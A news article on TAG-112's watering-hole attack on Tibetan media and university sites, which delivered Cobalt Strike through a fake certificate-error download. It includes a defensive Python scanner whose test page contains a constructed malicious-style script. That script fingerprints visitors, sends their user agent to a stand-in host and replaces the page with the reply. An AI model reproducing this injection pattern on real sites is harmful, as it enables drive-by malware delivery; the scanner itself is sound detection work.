Chinese TAG-112 Targets Tibetan Sites with Cobalt Strike in Cyber Espionage
A cyber espionage operation linked to Chinese interests, identified as TAG-112, has infiltrated Tibetan media and academic websites. The campaign's primary objective is to deliver Cobalt Strike, a tool for post-exploitation information gathering.
Malicious JavaScript and Fake Certificate Strategy
According to insights from the Insikt Group at Recorded Future, attackers embedded harmful JavaScript into the compromised sites, deceiving users with a counterfeit TLS certificate error. This trick entices unwary visitors to download a security certificate fabricated for this purpose but actually containing the Cobalt Strike payload. TAG-112, potentially an extension of the group Evasive Panda—variously recognized as Bronze Highland, Daggerfly, StormBamboo, and TAG-102—continues a strategic focus on Tibetan targets.
Websites Compromised
Affected Sites: In late May 2024, the Tibet Post (tibetpost[.]net) and the Gyudmed Tantric University (gyudmedtantricuniversity[.]org) websites were breached by TAG-112. The compromise works by tricking visitors into downloading and executing a file posing as a security certificate, which then loads the Cobalt Strike Beacon.
Vulnerability Exploited: The entry point was likely a security flaw in the Joomla CMS, which was used to upload the malicious JavaScript.
Execution Process: The script runs on the window.onload event and first fingerprints the visitor's operating system and browser, so that non-Windows users are filtered out.
Data Transmission: The browser type (e.g., Chrome or Edge) is relayed to a server (update.maskrisks[.]com), which serves a forged copy of that browser's TLS certificate error page.
Payload Delivery: The forged error page immediately triggers the download of an executable posing as a *.dnspod[.]cn certificate; once run, it loads the Cobalt Strike payload through DLL side-loading.
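A site operator checking whether their own pages carry an injected script of the kind described above can look for the combination of traits the report lists: an onload hook, an OS/browser check, contact with a host the site never uses, and a rewrite of the page. The following scanner is an added example written for this article, not Recorded Future's or Insikt Group's tooling; the allowlisted hosts and the stand-in host update.example.invalid in the sample page are constructed.

```python
"""Constructed defensive scanner, not Recorded Future's tooling: flags inline scripts that
show the reported traits (onload hook, OS/browser check, untrusted host, page rewrite)."""
import re
from urllib.parse import urlparse

# Assumption: the site operator keeps a per-site allowlist of hosts its scripts may contact.
TRUSTED_HOSTS = {"www.example.org", "cdn.example.org"}

# Inline <script> bodies (no src attribute) and, separately, the src of external scripts.
SCRIPT_RX = re.compile(r"<script\b(?![^>]*\bsrc\s*=)[^>]*>(.*?)</script\s*>", re.S | re.I)
SRC_RX = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
URL_RX = re.compile(r"https?://[^\s'\"<>]+")
# One regex per reported trait of the injected script.
TRAITS = {
    "onload_hook": re.compile(r"window\.onload|addEventListener\(\s*['\"]load['\"]"),
    "os_browser_check": re.compile(r"navigator\.(userAgent|platform|appVersion)"),
    "page_rewrite": re.compile(r"document\.write|\.innerHTML\s*="),
}

def scan_html(html, trusted=TRUSTED_HOSTS):
    """Return one finding per inline script with >= 3 traits, so a plain onload handler passes."""
    findings = []
    for body in SCRIPT_RX.findall(html):
        hits = [name for name, rx in TRAITS.items() if rx.search(body)]
        hosts = sorted({urlparse(u).hostname for u in URL_RX.findall(body)} - trusted)
        if hosts:
            hits.append("untrusted_host")
        if len(hits) >= 3:
            findings.append({"traits": sorted(hits), "hosts": hosts})
    for src in SRC_RX.findall(html):  # an external script pulled from an unknown host is reported outright
        host = urlparse(src).hostname
        if host and host not in trusted:
            findings.append({"traits": ["untrusted_script_src"], "hosts": [host]})
    return findings

# Constructed sample page: a benign onload handler plus one script in the reported style
# (update.example.invalid is a stand-in host, not the indicator from the article).
SAMPLE_PAGE = """<html><body>
<script src="https://cdn.example.org/site.js"></script>
<script>window.onload = function () { document.getElementById("d").textContent = "ok"; };</script>
<script>window.onload = function () {
  if (navigator.userAgent.indexOf("Windows") === -1) return;
  fetch("https://update.example.invalid/c?ua=" + encodeURIComponent(navigator.userAgent))
    .then(r => r.text()).then(h => { document.documentElement.innerHTML = h; });
};</script></body></html>"""
```

Running scan_html(SAMPLE_PAGE) reports only the third script, with all four traits and the untrusted host; the benign onload handler falls below the threshold.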
Broader Context
TAG-112's attack is not the first breach of the Tibet Post. Since September 2023, Evasive Panda has employed watering hole tactics against Tibetan users, deploying tools such as MgBot and Nightdoor. Despite the overlapping techniques, Recorded Future treats the breaches as distinct, citing differences in maturity: TAG-112's activity lacks the complexity of TAG-102's methods, suggesting that TAG-112 is a less sophisticated subgroup pursuing the same intelligence targets. This recent activity highlights the ongoing vulnerabilities within Tibetan digital spaces and underscores the need for stronger cybersecurity measures.